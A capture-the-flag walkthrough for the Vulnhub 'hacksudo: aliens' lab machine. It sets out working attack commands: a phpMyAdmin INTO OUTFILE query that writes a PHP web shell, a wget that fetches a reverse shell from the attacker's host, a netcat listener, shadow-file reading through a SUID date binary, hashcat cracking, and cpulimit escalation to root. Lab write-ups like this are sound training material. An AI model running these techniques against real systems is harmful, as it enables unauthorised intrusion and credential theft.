Vulnhub Walkthrough: hacksudo: aliens
Download Link: https://download.vulnhub.com/hacksudo/HacksudoAliens.zip
Author: billythegoat-1
Difficulty: easy..ish
Designer: Vishal Waghmare
👽 Dear readers, welcome! In this walkthrough, we’ll dive into the Aliens vulnerable machine by Hacksudo. This is my 4th write-up on a Hacksudo machine (maybe it’s time to try something new😅), but there’s something I love about the Hacksudo series: it’s perfect for beginners like me to grasp different vulnerability concepts easily.
Without further ado, let’s jump into the machine and start cracking! 🎯 Enjoy the journey! …Lessgoo!! 🚀🔥👾
Step 1: Information gathering
Let’s kick off by scanning our internal network to get the target IP using netdiscover.
netdiscover -r 192.168.4.0/24
IP address: 192.168.4.32
I went on and fired up nmap and gobuster to see what ports are open and whether any directory listings are exposed.
nmap -sC -sV 192.168.4.32
As you can see, we have two HTTP ports open: 80 and 9000. Let’s start with directory enumeration on port 80 and see if there is anything interesting there.
gobuster dir -u http://192.168.4.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php
Let’s examine the page’s source code to check for any comments that might contain hidden information. Nothing there, except a fun game at /game.html.
However, an interesting file is in the http://192.168.4.32/backup/ directory.
Cat that out and you get some credentials:
user="vishal"
password="hacksudo"
These credentials will hopefully be of help later on.
Moving on to the enumeration of port 9000 with gobuster.
We get a phpMyAdmin login page.
Step 2: Foothold
Using the credentials found earlier, we are able to log in as vishal.
I did some research on how to get a shell from phpMyAdmin and stumbled upon this article.
Step 3: Gaining Access
Using the following command:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/cmd.php'
This query writes a minimal PHP command shell into a file called cmd.php in the /var/www/html/ directory, which is only possible because the database user holds the FILE privilege and MySQL’s secure_file_priv does not restrict where files may be written.
Now, we head to port 80 and execute pwd to see if the cmd parameter is working:
192.168.4.32/cmd.php?cmd=pwd
Seems like it is working fine. Let’s try and get a persistent PHP reverse shell.
I used the pentestmonkey PHP reverse shell for this machine, creating a PHP file and pasting in the code. I then fired up a quick and simple Python server to host the reverse shell (shell.php).
python -m http.server 80
The command to get the reverse shell would be:
192.168.4.32/cmd.php?cmd=wget 192.168.4.3/shell.php
But first, we must URL-encode “wget 192.168.4.3/shell.php” using an online URL encoder:
192.168.4.32/cmd.php?cmd=wget%20192.168.4.3%2Fshell.php
After downloading the shell.php file, we now run our netcat listener:
nc -lvnp 9001
And trigger shell.php by browsing to:
192.168.4.32/shell.php
Immediately after getting a shell, I upgraded it to an interactive TTY using:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
I check whether there are any binaries with the SUID bit set using:
find / -perm -4000 -type f 2>/dev/null
At the end of the listing, we see an unusual binary: date.
After checking on GTFOBins, date can be used to escalate privileges (it reads files as the owner of the SUID binary) using:
LFILE=file_to_read
./date -f $LFILE
I preferred putting it in a script and running it from there.
run ./elevate.sh
Step 3: Privilege Escalation 1
We can see the user hacksudo’s hashed password. Let’s use hashcat to crack it using the following command:
hashcat -m 1800 -a 0 hash.txt rockyou.txt
We get the following password: aliens
Let’s ssh into the machine to get access to a convenient shell.
We get our user flag in the /home/hacksudo/Desktop/ directory.
Next, we check whether there are any SUID binaries that the user hacksudo has access to.
At the very top, we observe the cpulimit binary. A quick look at GTFOBins and we get our exploit:
./cpulimit -l 100 -f -- /bin/sh -p
The binary happens to be in the /Download directory.
Step 4: Privilege Escalation 2
Using our exploit from GTFOBins, we get our root shell.
Conclusion:
🎉 And there you have it, dear readers! Another banger from Vishal Waghmare. This machine was a real standout for me, as it was my first time exploiting a vulnerability through phpMyAdmin, a great learning experience! Once I leveraged the phpMyAdmin vulnerability to gain shell access, the rest was relatively straightforward, with familiar SUID binaries to explore.
Thank you for following along on this journey! I hope you enjoyed it as much as I did. Stay tuned for the next walkthrough; I’ll see you there! Cheers! 🍻💻